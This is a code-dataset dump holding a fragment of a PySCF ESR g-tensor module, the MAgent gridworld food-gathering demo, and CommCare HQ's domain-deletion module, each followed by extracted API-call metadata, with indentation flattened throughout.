muB = .5 # Bohr magneton
#qed_fac = (nist.G_ELECTRON - 1)
orboa = mo_coeff[0][:,mo_occ[0]>0]
orbob = mo_coeff[1][:,mo_occ[1]>0]
dm0a = numpy.dot(orboa, orboa.T)
dm0b = numpy.dot(orbob, orbob.T)
dm10a = [reduce(numpy.dot, (mo_coeff[0], x, orboa.T)) for x in mo10[0]]
dm10b = [reduce(numpy.dot, (mo_coeff[1], x, orbob.T)) for x in mo10[1]]
dm10a = numpy.asarray([x-x.T for x in dm10a])
dm10b = numpy.asarray([x-x.T for x in dm10b])
hso1e = uhf_esr.make_h01_soc1e(obj, mo_coeff, mo_occ, qed_fac)
para1e =-numpy.einsum('xji,yij->xy', dm10a, hso1e)
para1e+= numpy.einsum('xji,yij->xy', dm10b, hso1e)
para1e *= 1./effspin / muB
#_write(obj, align(para1e)[0], 'SOC(1e)/OZ')
if obj.para_soc2e:
raise NotImplementedError('dia_soc2e = %s' % obj.dia_soc2e)
para = para1e
return para
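# Note: para1e above contracts the first-order (orbital Zeeman) density
# response dm10 with the one-electron SOC integrals hso1e, and the
# 1/(effspin * muB) scaling expresses the result as a g-tensor (ESR)
# contribution; see the references in the module docstring.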
# Treat Vxc as one-particle operator Vnuc
def get_vxc_soc(ni, mol, grids, xc_code, dms, max_memory=2000, verbose=None):
xctype = ni._xc_type(xc_code)
make_rho, nset, nao = ni._gen_rho_evaluator(mol, dms, hermi=1)
ngrids = len(grids.weights)
BLKSIZE = numint.BLKSIZE
blksize = min(int(max_memory/12*1e6/8/nao/BLKSIZE)*BLKSIZE, ngrids)
shls_slice = (0, mol.nbas)
ao_loc = mol.ao_loc_nr()
vmat = numpy.zeros((2,3,nao,nao))
if xctype == 'LDA':
buf = numpy.empty((4,blksize,nao))
ao_deriv = 1
for ao, mask, weight, coords \
in ni.block_loop(mol, grids, nao, ao_deriv, max_memory,
blksize=blksize, buf=buf):
rho_a = make_rho(0, ao[0], mask, 'LDA')
rho_b = make_rho(1, ao[0], mask, 'LDA')
vxc = ni.eval_xc(xc_code, (rho_a, rho_b), 1, deriv=1)[1]
vrho = vxc[0]
aow = numpy.einsum('xpi,p->xpi', ao[1:], weight*vrho[:,0])
_cross3x3_(vmat[0], mol, aow, ao[1:], mask, shls_slice, ao_loc)
aow = numpy.einsum('xpi,p->xpi', ao[1:], weight*vrho[:,1])
_cross3x3_(vmat[1], mol, aow, ao[1:], mask, shls_slice, ao_loc)
rho = vxc = vrho = aow = None
elif xctype == 'GGA':
buf = numpy.empty((10,blksize,nao))
ao_deriv = 2
for ao, mask, weight, coords \
in ni.block_loop(mol, grids, nao, ao_deriv, max_memory,
blksize=blksize, buf=buf):
rho_a = make_rho(0, ao, mask, 'GGA')
rho_b = make_rho(1, ao, mask, 'GGA')
vxc = ni.eval_xc(xc_code, (rho_a,rho_b), 1, deriv=1)[1]
wva, wvb = numint._uks_gga_wv0((rho_a, rho_b), vxc, weight)
ip_ao = ao[1:4]
ipip_ao = ao[4:]
aow = rks_grad._make_dR_dao_w(ao, wva)
_cross3x3_(vmat[0], mol, aow, ip_ao, mask, shls_slice, ao_loc)
aow = rks_grad._make_dR_dao_w(ao, wvb)
_cross3x3_(vmat[1], mol, aow, ip_ao, mask, shls_slice, ao_loc)
rho = vxc = vrho = vsigma = wv = aow = None
vmat = vmat - vmat.transpose(0,1,3,2)
else:
raise NotImplementedError('meta-GGA')
return vmat
def _cross3x3_(out, mol, ao1, ao2, mask, shls_slice, ao_loc):
out[0] += numint._dot_ao_ao(mol, ao1[1], ao2[2], mask, shls_slice, ao_loc)
out[0] -= numint._dot_ao_ao(mol, ao1[2], ao2[1], mask, shls_slice, ao_loc)
out[1] += numint._dot_ao_ao(mol, ao1[2], ao2[0], mask, shls_slice, ao_loc)
out[1] -= numint._dot_ao_ao(mol, ao1[0], ao2[2], mask, shls_slice, ao_loc)
out[2] += numint._dot_ao_ao(mol, ao1[0], ao2[1], mask, shls_slice, ao_loc)
out[2] -= numint._dot_ao_ao(mol, ao1[1], ao2[0], mask, shls_slice, ao_loc)
return out
# Jia, start to work here
class ESR(uhf_esr.ESR):
'''dE = B dot gtensor dot s'''
def __init__(self, scf_method):
uhf_esr.ESR.__init__(self, scf_method)
self.dia_soc2e = False
self.para_soc2e = False
def para(self, mo10=None, mo_coeff=None, mo_occ=None):
if mo_coeff is None: mo_coeff = self._scf.mo_coeff
if mo_occ is None: mo_occ = self._scf.mo_occ
if mo10 is None:
self.mo10, self.mo_e10 = self.solve_mo1()
mo10 = self.mo10
return para(self, mo10, mo_coeff, mo_occ)
#make_para_soc2e = make_para_soc2e
get_fock = uks_nmr.get_fock
if __name__ == '__main__':
from pyscf import gto, scf
mol = gto.M(atom='H 0 0.1 0; H 0 0 1.',
basis='ccpvdz', spin=1, charge=-1, verbose=3)
mf = scf.UKS(mol).set(xc='bp86').run()
esr_obj = ESR(mf)
esr_obj.gauge_orig = (0,0,0)
esr_obj.para_soc2e = False
esr_obj.so_eff_charge = True
print(esr_obj.kernel())
mol = gto.M(atom='''
H 0 0 1
H 1.2 0 1
H .1 1.1 0.3
H .8 .7 .6
''',
basis='ccpvdz', spin=1, charge=1, verbose=3)
mf = scf.UKS(mol).set(xc='bp86').run()
    gobj = ESR(mf)
#print(gobj.kernel())
gobj.para_soc2e = 'SSO'
gobj.dia_soc2e = None
gobj.so_eff_charge = False
nao, nmo = mf.mo_coeff[0].shape
nelec = mol.nelec
numpy.random.seed(1)
mo10 =[numpy.random.random((3,nmo,nelec[0])),
numpy.random.random((3,nmo,nelec[1]))]
print(lib.finger(para(gobj, mo10, mf.mo_coeff, mf.mo_occ)) - -2.1813250579863279e-05)
numpy.random.seed(1)
dm0 = numpy.random.random((2,nao,nao))
dm0 = dm0 + dm0.transpose(0,2,1)
dm10 = numpy.random.random((2,3,nao,nao))
dm10 = dm10 - dm10.transpose(0,1,3,2)
    # make_para_soc2e is not defined in this module (its assignment in the
    # ESR class is commented out above), so this regression check is disabled:
    # print(lib.finger(make_para_soc2e(gobj, dm0, dm10)) - 0.0036073897889263721)
| [((49, 11, 49, 36), 'numpy.dot', 'numpy.dot', ({(49, 21, 49, 26): 'orboa', (49, 28, 49, 35): 'orboa.T'}, {}), '(orboa, orboa.T)', False, 'import numpy, sys\n'), ((50, 11, 50, 36), 'numpy.dot', 'numpy.dot', ({(50, 21, 50, 26): 'orbob', (50, 28, 50, 35): 'orbob.T'}, {}), '(orbob, orbob.T)', False, 'import numpy, sys\n'), ((53, 12, 53, 49), 'numpy.asarray', 'numpy.asarray', ({(53, 26, 53, 48): '[(x - x.T) for x in dm10a]'}, {}), '([(x - x.T) for x in dm10a])', False, 'import numpy, sys\n'), ((54, 12, 54, 49), 'numpy.asarray', 'numpy.asarray', ({(54, 26, 54, 48): '[(x - x.T) for x in dm10b]'}, {}), '([(x - x.T) for x in dm10b])', False, 'import numpy, sys\n'), ((56, 12, 56, 66), 'pyscf.prop.esr.uhf.make_h01_soc1e', 'uhf_esr.make_h01_soc1e', ({(56, 35, 56, 38): 'obj', (56, 40, 56, 48): 'mo_coeff', (56, 50, 56, 56): 'mo_occ', (56, 58, 56, 65): 'qed_fac'}, {}), '(obj, mo_coeff, mo_occ, qed_fac)', True, 'from pyscf.prop.esr import uhf as uhf_esr\n'), ((58, 13, 58, 54), 'numpy.einsum', 'numpy.einsum', ({(58, 26, 58, 39): '"""xji,yij->xy"""', (58, 41, 58, 46): 'dm10b', (58, 48, 58, 53): 'hso1e'}, {}), "('xji,yij->xy', dm10b, hso1e)", False, 'import numpy, sys\n'), ((79, 11, 79, 37), 'numpy.zeros', 'numpy.zeros', ({(79, 23, 79, 36): '(2, 3, nao, nao)'}, {}), '((2, 3, nao, nao))', False, 'import numpy, sys\n'), ((123, 14, 123, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(123, 32, 123, 35): 'mol', (123, 37, 123, 43): 'ao1[1]', (123, 45, 123, 51): 'ao2[2]', (123, 53, 123, 57): 'mask', (123, 59, 123, 69): 'shls_slice', (123, 71, 123, 77): 'ao_loc'}, {}), '(mol, ao1[1], ao2[2], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((124, 14, 124, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(124, 32, 124, 35): 'mol', (124, 37, 124, 43): 'ao1[2]', (124, 45, 124, 51): 'ao2[1]', (124, 53, 124, 57): 'mask', (124, 59, 124, 69): 'shls_slice', (124, 71, 124, 77): 'ao_loc'}, {}), '(mol, ao1[2], ao2[1], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((125, 14, 125, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(125, 32, 125, 35): 'mol', (125, 37, 125, 43): 'ao1[2]', (125, 45, 125, 51): 'ao2[0]', (125, 53, 125, 57): 'mask', (125, 59, 125, 69): 'shls_slice', (125, 71, 125, 77): 'ao_loc'}, {}), '(mol, ao1[2], ao2[0], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((126, 14, 126, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(126, 32, 126, 35): 'mol', (126, 37, 126, 43): 'ao1[0]', (126, 45, 126, 51): 'ao2[2]', (126, 53, 126, 57): 'mask', (126, 59, 126, 69): 'shls_slice', (126, 71, 126, 77): 'ao_loc'}, {}), '(mol, ao1[0], ao2[2], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((127, 14, 127, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(127, 32, 127, 35): 'mol', (127, 37, 127, 43): 'ao1[0]', (127, 45, 127, 51): 'ao2[1]', (127, 53, 127, 57): 'mask', (127, 59, 127, 69): 'shls_slice', (127, 71, 127, 77): 'ao_loc'}, {}), '(mol, ao1[0], ao2[1], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((128, 14, 128, 78), 'pyscf.dft.numint._dot_ao_ao', 'numint._dot_ao_ao', ({(128, 32, 128, 35): 'mol', (128, 37, 128, 43): 'ao1[1]', (128, 45, 128, 51): 'ao2[0]', (128, 53, 128, 57): 'mask', (128, 59, 128, 69): 'shls_slice', (128, 71, 128, 77): 'ao_loc'}, {}), '(mol, ao1[1], ao2[0], mask, shls_slice, ao_loc)', False, 'from pyscf.dft import numint\n'), ((153, 10, 154, 61), 'pyscf.gto.M', 'gto.M', (), '', False, 'from pyscf import gto, scf\n'), ((162, 10, 168, 60), 
'pyscf.gto.M', 'gto.M', (), '', False, 'from pyscf import gto, scf\n'), ((177, 4, 177, 24), 'numpy.random.seed', 'numpy.random.seed', ({(177, 22, 177, 23): '(1)'}, {}), '(1)', False, 'import numpy, sys\n'), ((181, 4, 181, 24), 'numpy.random.seed', 'numpy.random.seed', ({(181, 22, 181, 23): '(1)'}, {}), '(1)', False, 'import numpy, sys\n'), ((182, 10, 182, 42), 'numpy.random.random', 'numpy.random.random', ({(182, 30, 182, 41): '(2, nao, nao)'}, {}), '((2, nao, nao))', False, 'import numpy, sys\n'), ((184, 11, 184, 45), 'numpy.random.random', 'numpy.random.random', ({(184, 31, 184, 44): '(2, 3, nao, nao)'}, {}), '((2, 3, nao, nao))', False, 'import numpy, sys\n'), ((51, 13, 51, 57), 'functools.reduce', 'reduce', ({(51, 20, 51, 29): 'numpy.dot', (51, 31, 51, 56): '(mo_coeff[0], x, orboa.T)'}, {}), '(numpy.dot, (mo_coeff[0], x, orboa.T))', False, 'from functools import reduce\n'), ((52, 13, 52, 57), 'functools.reduce', 'reduce', ({(52, 20, 52, 29): 'numpy.dot', (52, 31, 52, 56): '(mo_coeff[1], x, orbob.T)'}, {}), '(numpy.dot, (mo_coeff[1], x, orbob.T))', False, 'from functools import reduce\n'), ((57, 13, 57, 54), 'numpy.einsum', 'numpy.einsum', ({(57, 26, 57, 39): '"""xji,yij->xy"""', (57, 41, 57, 46): 'dm10a', (57, 48, 57, 53): 'hso1e'}, {}), "('xji,yij->xy', dm10a, hso1e)", False, 'import numpy, sys\n'), ((81, 14, 81, 42), 'numpy.empty', 'numpy.empty', ({(81, 26, 81, 41): '(4, blksize, nao)'}, {}), '((4, blksize, nao))', False, 'import numpy, sys\n'), ((135, 8, 135, 46), 'pyscf.prop.esr.uhf.ESR.__init__', 'uhf_esr.ESR.__init__', ({(135, 29, 135, 33): 'self', (135, 35, 135, 45): 'scf_method'}, {}), '(self, scf_method)', True, 'from pyscf.prop.esr import uhf as uhf_esr\n'), ((178, 11, 178, 48), 'numpy.random.random', 'numpy.random.random', ({(178, 31, 178, 47): '(3, nmo, nelec[0])'}, {}), '((3, nmo, nelec[0]))', False, 'import numpy, sys\n'), ((179, 11, 179, 48), 'numpy.random.random', 'numpy.random.random', ({(179, 31, 179, 47): '(3, nmo, nelec[1])'}, {}), '((3, nmo, nelec[1]))', False, 'import numpy, sys\n'), ((90, 18, 90, 70), 'numpy.einsum', 'numpy.einsum', ({(90, 31, 90, 43): '"""xpi,p->xpi"""', (90, 45, 90, 51): 'ao[1:]', (90, 53, 90, 69): 'weight * vrho[:, (0)]'}, {}), "('xpi,p->xpi', ao[1:], weight * vrho[:, (0)])", False, 'import numpy, sys\n'), ((92, 18, 92, 70), 'numpy.einsum', 'numpy.einsum', ({(92, 31, 92, 43): '"""xpi,p->xpi"""', (92, 45, 92, 51): 'ao[1:]', (92, 53, 92, 69): 'weight * vrho[:, (1)]'}, {}), "('xpi,p->xpi', ao[1:], weight * vrho[:, (1)])", False, 'import numpy, sys\n'), ((97, 14, 97, 43), 'numpy.empty', 'numpy.empty', ({(97, 26, 97, 42): '(10, blksize, nao)'}, {}), '((10, blksize, nao))', False, 'import numpy, sys\n'), ((105, 23, 105, 71), 'pyscf.dft.numint._uks_gga_wv0', 'numint._uks_gga_wv0', ({(105, 43, 105, 57): '(rho_a, rho_b)', (105, 59, 105, 62): 'vxc', (105, 64, 105, 70): 'weight'}, {}), '((rho_a, rho_b), vxc, weight)', False, 'from pyscf.dft import numint\n'), ((109, 18, 109, 50), 'pyscf.grad.rks._make_dR_dao_w', 'rks_grad._make_dR_dao_w', ({(109, 42, 109, 44): 'ao', (109, 46, 109, 49): 'wva'}, {}), '(ao, wva)', True, 'from pyscf.grad import rks as rks_grad\n'), ((111, 18, 111, 50), 'pyscf.grad.rks._make_dR_dao_w', 'rks_grad._make_dR_dao_w', ({(111, 42, 111, 44): 'ao', (111, 46, 111, 49): 'wvb'}, {}), '(ao, wvb)', True, 'from pyscf.grad import rks as rks_grad\n'), ((155, 9, 155, 21), 'pyscf.scf.UKS', 'scf.UKS', ({(155, 17, 155, 20): 'mol'}, {}), '(mol)', False, 'from pyscf import gto, scf\n'), ((169, 9, 169, 21), 'pyscf.scf.UKS', 'scf.UKS', ({(169, 17, 
169, 20): 'mol'}, {}), '(mol)', False, 'from pyscf import gto, scf\n')] |
mununum/MAgent | examples/gather_demo.py | 7272cd726182280444597310d52369fac5e13e37 | import random
import magent
from magent.builtin.rule_model import RandomActor
import numpy as np
def init_food(env, food_handle):
tree = np.asarray([[-1,0], [0,0], [0,-1], [0,1], [1,0]])
third = map_size//4 # mapsize includes walls
for i in range(1, 4):
for j in range(1, 4):
base = np.asarray([third*i, third*j])
env.add_agents(food_handle, method="custom", pos=tree+base)
def neighbor_regen_food(env, food_handle, p=0.003):
coords = env.get_pos(food_handle)
rands = np.random.random(len(coords))
for i, pos in enumerate(coords):
if rands[i] > p:
continue
neighbor = np.asarray([[-1,0],[0,-1], [0,1], [1,0]])
regen_pos = [pos+neighbor[np.random.randint(0,4)]]
env.add_agents(food_handle, method="custom",
pos=regen_pos)
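# With regeneration probability p per food cell per step, the expected number
# of regrown food items per step is roughly p * len(coords); for the 45 cells
# planted by init_food (a 5-cell "tree" at each of 9 bases) and p=0.003 that
# is about 0.14 new food items per step.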
if __name__ == "__main__":
gw = magent.gridworld
cfg = gw.Config()
map_size = 25
cfg.set({"map_width": map_size, "map_height": map_size})
agent_group = cfg.add_group(
cfg.register_agent_type(
name="agent",
attr={
'width': 1,
'length': 1,
'view_range': gw.CircleRange(4),
'can_gather': True}))
food_group = cfg.add_group(
cfg.register_agent_type(
"food",
attr={'width': 1,
'length': 1,
'can_be_gathered': True}))
# add reward rule
a = gw.AgentSymbol(agent_group, index='any')
b = gw.AgentSymbol(food_group, index='any')
e = gw.Event(a, 'collide', b)
cfg.add_reward_rule(e, receiver=a, value=1)
# cfg.add_reward_rule(e2, receiver=b, value=1, die=True)
# cfg.add_reward_rule(e3, receiver=[a,b], value=[-1,-1])
env = magent.GridWorld(cfg)
agent_handle, food_handle = env.get_handles()
model1 = RandomActor(env, agent_handle, "up")
env.set_render_dir("build/render")
env.reset()
upstart = [(map_size//2 - 2, map_size//2 - 2), (map_size//2 + 2, map_size//2 - 2),
(map_size//2, map_size//2), (map_size//2 - 2, map_size//2 + 2),
(map_size//2 + 2, map_size//2 + 2)]
# spawnrate = 0.1
env.add_agents(agent_handle, method="custom", pos=upstart)
# env.add_agents(rightgroup, method="custom", pos=rightstart)
init_food(env, food_handle)
k = env.get_observation(agent_handle)
    print(env.get_pos(agent_handle))
    print(len(env.get_pos(food_handle)))
done = False
step_ct = 0
r_sum = 0
while not done:
obs_1 = env.get_observation(agent_handle)
ids_1 = env.get_agent_id(agent_handle)
acts_1 = model1.infer_action(obs_1, ids_1)
env.set_action(agent_handle, acts_1)
# simulate one step
done = env.step()
# render
env.render()
# get reward
reward = sum(env.get_reward(agent_handle))
r_sum += reward
# clear dead agents
env.clear_dead()
        neighbor_regen_food(env, food_handle)
# print info
# if step_ct % 10 == 0:
# print("step %d" % step_ct)
step_ct += 1
if step_ct > 250:
break
    print(r_sum)
| []
shyamkumarlchauhan/commcare-hq | corehq/apps/domain/deletion.py | 99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48 | import itertools
import logging
from datetime import date
from django.apps import apps
from django.conf import settings
from django.db import connection, transaction
from django.db.models import Q
from dimagi.utils.chunked import chunked
from corehq.apps.accounting.models import Subscription
from corehq.apps.accounting.utils import get_change_status
from corehq.apps.custom_data_fields.dbaccessors import get_by_domain_and_type
from corehq.apps.domain.utils import silence_during_tests
from corehq.apps.locations.views import LocationFieldsView
from corehq.apps.products.views import ProductFieldsView
from corehq.apps.userreports.dbaccessors import (
delete_all_ucr_tables_for_domain,
)
from corehq.apps.users.views.mobile import UserFieldsView
from corehq.blobs import CODES, get_blob_db
from corehq.blobs.models import BlobMeta
from corehq.form_processor.backends.sql.dbaccessors import doc_type_to_state
from corehq.form_processor.interfaces.dbaccessors import (
CaseAccessors,
FormAccessors,
)
from corehq.util.log import with_progress_bar
logger = logging.getLogger(__name__)
class BaseDeletion(object):
def __init__(self, app_label):
self.app_label = app_label
def is_app_installed(self):
try:
return bool(apps.get_app_config(self.app_label))
except LookupError:
return False
class CustomDeletion(BaseDeletion):
def __init__(self, app_label, deletion_fn):
super(CustomDeletion, self).__init__(app_label)
self.deletion_fn = deletion_fn
def execute(self, domain_name):
if self.is_app_installed():
self.deletion_fn(domain_name)
class RawDeletion(BaseDeletion):
def __init__(self, app_label, raw_query):
super(RawDeletion, self).__init__(app_label)
self.raw_query = raw_query
def execute(self, cursor, domain_name):
if self.is_app_installed():
cursor.execute(self.raw_query, [domain_name])
class ModelDeletion(BaseDeletion):
def __init__(self, app_label, model_name, domain_filter_kwarg):
super(ModelDeletion, self).__init__(app_label)
self.domain_filter_kwarg = domain_filter_kwarg
self.model_name = model_name
def get_model_class(self):
return apps.get_model(self.app_label, self.model_name)
def execute(self, domain_name):
if not domain_name:
# The Django orm will properly turn a None domain_name to a
# IS NULL filter. We don't want to allow deleting records for
# NULL domain names since they might have special meaning (like
# in some of the SMS models).
raise RuntimeError("Expected a valid domain name")
if self.is_app_installed():
model = self.get_model_class()
model.objects.filter(**{self.domain_filter_kwarg: domain_name}).delete()
def _delete_domain_backend_mappings(domain_name):
model = apps.get_model('sms', 'SQLMobileBackendMapping')
model.objects.filter(is_global=False, domain=domain_name).delete()
def _delete_domain_backends(domain_name):
model = apps.get_model('sms', 'SQLMobileBackend')
model.objects.filter(is_global=False, domain=domain_name).delete()
def _delete_web_user_membership(domain_name):
from corehq.apps.users.models import WebUser
active_web_users = WebUser.by_domain(domain_name)
inactive_web_users = WebUser.by_domain(domain_name, is_active=False)
for web_user in list(active_web_users) + list(inactive_web_users):
web_user.delete_domain_membership(domain_name)
if settings.UNIT_TESTING and not web_user.domain_memberships:
web_user.delete()
else:
web_user.save()
def _terminate_subscriptions(domain_name):
today = date.today()
with transaction.atomic():
current_subscription = Subscription.get_active_subscription_by_domain(domain_name)
if current_subscription:
current_subscription.date_end = today
current_subscription.is_active = False
current_subscription.save()
current_subscription.transfer_credits()
_, downgraded_privs, upgraded_privs = get_change_status(current_subscription.plan_version, None)
current_subscription.subscriber.deactivate_subscription(
downgraded_privileges=downgraded_privs,
upgraded_privileges=upgraded_privs,
old_subscription=current_subscription,
new_subscription=None,
)
Subscription.visible_objects.filter(
Q(date_start__gt=today) | Q(date_start=today, is_active=False),
subscriber__domain=domain_name,
).update(is_hidden_to_ops=True)
def _delete_all_cases(domain_name):
logger.info('Deleting cases...')
case_accessor = CaseAccessors(domain_name)
case_ids = case_accessor.get_case_ids_in_domain()
for case_id_chunk in chunked(with_progress_bar(case_ids, stream=silence_during_tests()), 500):
case_accessor.soft_delete_cases(list(case_id_chunk))
logger.info('Deleting cases complete.')
def _delete_all_forms(domain_name):
logger.info('Deleting forms...')
form_accessor = FormAccessors(domain_name)
form_ids = list(itertools.chain(*[
form_accessor.get_all_form_ids_in_domain(doc_type=doc_type)
for doc_type in doc_type_to_state
]))
for form_id_chunk in chunked(with_progress_bar(form_ids, stream=silence_during_tests()), 500):
form_accessor.soft_delete_forms(list(form_id_chunk))
logger.info('Deleting forms complete.')
def _delete_data_files(domain_name):
get_blob_db().bulk_delete(metas=list(BlobMeta.objects.partitioned_query(domain_name).filter(
parent_id=domain_name,
type_code=CODES.data_file,
)))
def _delete_custom_data_fields(domain_name):
# The CustomDataFieldsDefinition instances are cleaned up as part of the
# bulk couch delete, but we also need to clear the cache
logger.info('Deleting custom data fields...')
for field_view in [LocationFieldsView, ProductFieldsView, UserFieldsView]:
get_by_domain_and_type.clear(domain_name, field_view.field_type)
logger.info('Deleting custom data fields complete.')
# We use raw queries instead of the ORM because a Django queryset delete needs
# to fetch objects into memory to send signals and handle cascades, which makes
# deletion very slow when there are millions of rows in the stock data tables.
DOMAIN_DELETE_OPERATIONS = [
RawDeletion('stock', """
DELETE FROM stock_stocktransaction
WHERE report_id IN (SELECT id FROM stock_stockreport WHERE domain=%s)
"""),
RawDeletion('stock', "DELETE FROM stock_stockreport WHERE domain=%s"),
RawDeletion('stock', """
DELETE FROM commtrack_stockstate
WHERE product_id IN (SELECT product_id FROM products_sqlproduct WHERE domain=%s)
"""),
ModelDeletion('products', 'SQLProduct', 'domain'),
ModelDeletion('locations', 'SQLLocation', 'domain'),
ModelDeletion('locations', 'LocationType', 'domain'),
ModelDeletion('stock', 'DocDomainMapping', 'domain_name'),
ModelDeletion('domain_migration_flags', 'DomainMigrationProgress', 'domain'),
ModelDeletion('sms', 'DailyOutboundSMSLimitReached', 'domain'),
ModelDeletion('sms', 'SMS', 'domain'),
ModelDeletion('sms', 'SQLLastReadMessage', 'domain'),
ModelDeletion('sms', 'ExpectedCallback', 'domain'),
ModelDeletion('ivr', 'Call', 'domain'),
ModelDeletion('sms', 'Keyword', 'domain'),
ModelDeletion('sms', 'PhoneNumber', 'domain'),
ModelDeletion('sms', 'MessagingSubEvent', 'parent__domain'),
ModelDeletion('sms', 'MessagingEvent', 'domain'),
ModelDeletion('sms', 'QueuedSMS', 'domain'),
ModelDeletion('sms', 'SelfRegistrationInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backend_mappings),
ModelDeletion('sms', 'MobileBackendInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backends),
CustomDeletion('users', _delete_web_user_membership),
CustomDeletion('accounting', _terminate_subscriptions),
CustomDeletion('form_processor', _delete_all_cases),
CustomDeletion('form_processor', _delete_all_forms),
ModelDeletion('aggregate_ucrs', 'AggregateTableDefinition', 'domain'),
ModelDeletion('app_manager', 'AppReleaseByLocation', 'domain'),
ModelDeletion('app_manager', 'LatestEnabledBuildProfiles', 'domain'),
ModelDeletion('app_manager', 'ResourceOverride', 'domain'),
ModelDeletion('app_manager', 'GlobalAppConfig', 'domain'),
ModelDeletion('case_importer', 'CaseUploadRecord', 'domain'),
ModelDeletion('case_search', 'CaseSearchConfig', 'domain'),
ModelDeletion('case_search', 'CaseSearchQueryAddition', 'domain'),
ModelDeletion('case_search', 'FuzzyProperties', 'domain'),
ModelDeletion('case_search', 'IgnorePatterns', 'domain'),
ModelDeletion('cloudcare', 'ApplicationAccess', 'domain'),
ModelDeletion('consumption', 'DefaultConsumption', 'domain'),
ModelDeletion('data_analytics', 'GIRRow', 'domain_name'),
ModelDeletion('data_analytics', 'MALTRow', 'domain_name'),
ModelDeletion('data_dictionary', 'CaseType', 'domain'),
ModelDeletion('data_interfaces', 'CaseRuleAction', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleCriteria', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'domain'), # TODO
ModelDeletion('data_interfaces', 'AutomaticUpdateRule', 'domain'),
ModelDeletion('data_interfaces', 'DomainCaseRuleRun', 'domain'),
ModelDeletion('domain', 'TransferDomainRequest', 'domain'),
ModelDeletion('export', 'EmailExportWhenDoneRequest', 'domain'),
CustomDeletion('export', _delete_data_files),
ModelDeletion('locations', 'LocationFixtureConfiguration', 'domain'),
ModelDeletion('ota', 'MobileRecoveryMeasure', 'domain'),
ModelDeletion('ota', 'SerialIdBucket', 'domain'),
ModelDeletion('phone', 'OwnershipCleanlinessFlag', 'domain'),
ModelDeletion('phone', 'SyncLogSQL', 'domain'),
ModelDeletion('registration', 'RegistrationRequest', 'domain'),
ModelDeletion('reminders', 'EmailUsage', 'domain'),
ModelDeletion('reports', 'ReportsSidebarOrdering', 'domain'),
ModelDeletion('smsforms', 'SQLXFormsSession', 'domain'),
ModelDeletion('translations', 'SMSTranslations', 'domain'),
ModelDeletion('translations', 'TransifexBlacklist', 'domain'),
ModelDeletion('userreports', 'AsyncIndicator', 'domain'),
ModelDeletion('users', 'DomainRequest', 'domain'),
ModelDeletion('users', 'Invitation', 'domain'),
ModelDeletion('users', 'DomainPermissionsMirror', 'source'),
ModelDeletion('zapier', 'ZapierSubscription', 'domain'),
ModelDeletion('dhis2', 'Dhis2Connection', 'domain'),
ModelDeletion('motech', 'RequestLog', 'domain'),
ModelDeletion('couchforms', 'UnfinishedSubmissionStub', 'domain'),
CustomDeletion('custom_data_fields', _delete_custom_data_fields),
CustomDeletion('ucr', delete_all_ucr_tables_for_domain),
]
def apply_deletion_operations(domain_name):
raw_ops, model_ops = _split_ops_by_type(DOMAIN_DELETE_OPERATIONS)
with connection.cursor() as cursor:
for op in raw_ops:
op.execute(cursor, domain_name)
for op in model_ops:
op.execute(domain_name)
def _split_ops_by_type(ops):
raw_ops = []
model_ops = []
for op in ops:
if isinstance(op, RawDeletion):
raw_ops.append(op)
else:
model_ops.append(op)
return raw_ops, model_ops
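# Example usage (a minimal sketch; "example-domain" is a hypothetical domain
# name, and in practice this module is driven by the domain deletion flow):
#
#     from corehq.apps.domain.deletion import apply_deletion_operations
#     apply_deletion_operations("example-domain")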
| [((31, 9, 31, 36), 'logging.getLogger', 'logging.getLogger', ({(31, 27, 31, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((91, 12, 91, 60), 'django.apps.apps.get_model', 'apps.get_model', ({(91, 27, 91, 32): '"""sms"""', (91, 34, 91, 59): '"""SQLMobileBackendMapping"""'}, {}), "('sms', 'SQLMobileBackendMapping')", False, 'from django.apps import apps\n'), ((96, 12, 96, 53), 'django.apps.apps.get_model', 'apps.get_model', ({(96, 27, 96, 32): '"""sms"""', (96, 34, 96, 52): '"""SQLMobileBackend"""'}, {}), "('sms', 'SQLMobileBackend')", False, 'from django.apps import apps\n'), ((102, 23, 102, 53), 'corehq.apps.users.models.WebUser.by_domain', 'WebUser.by_domain', ({(102, 41, 102, 52): 'domain_name'}, {}), '(domain_name)', False, 'from corehq.apps.users.models import WebUser\n'), ((103, 25, 103, 72), 'corehq.apps.users.models.WebUser.by_domain', 'WebUser.by_domain', (), '', False, 'from corehq.apps.users.models import WebUser\n'), ((113, 12, 113, 24), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date\n'), ((141, 20, 141, 46), 'corehq.form_processor.interfaces.dbaccessors.CaseAccessors', 'CaseAccessors', ({(141, 34, 141, 45): 'domain_name'}, {}), '(domain_name)', False, 'from corehq.form_processor.interfaces.dbaccessors import CaseAccessors, FormAccessors\n'), ((150, 20, 150, 46), 'corehq.form_processor.interfaces.dbaccessors.FormAccessors', 'FormAccessors', ({(150, 34, 150, 45): 'domain_name'}, {}), '(domain_name)', False, 'from corehq.form_processor.interfaces.dbaccessors import CaseAccessors, FormAccessors\n'), ((76, 15, 76, 62), 'django.apps.apps.get_model', 'apps.get_model', ({(76, 30, 76, 44): 'self.app_label', (76, 46, 76, 61): 'self.model_name'}, {}), '(self.app_label, self.model_name)', False, 'from django.apps import apps\n'), ((115, 9, 115, 29), 'django.db.transaction.atomic', 'transaction.atomic', ({}, {}), '()', False, 'from django.db import connection, transaction\n'), ((116, 31, 116, 90), 'corehq.apps.accounting.models.Subscription.get_active_subscription_by_domain', 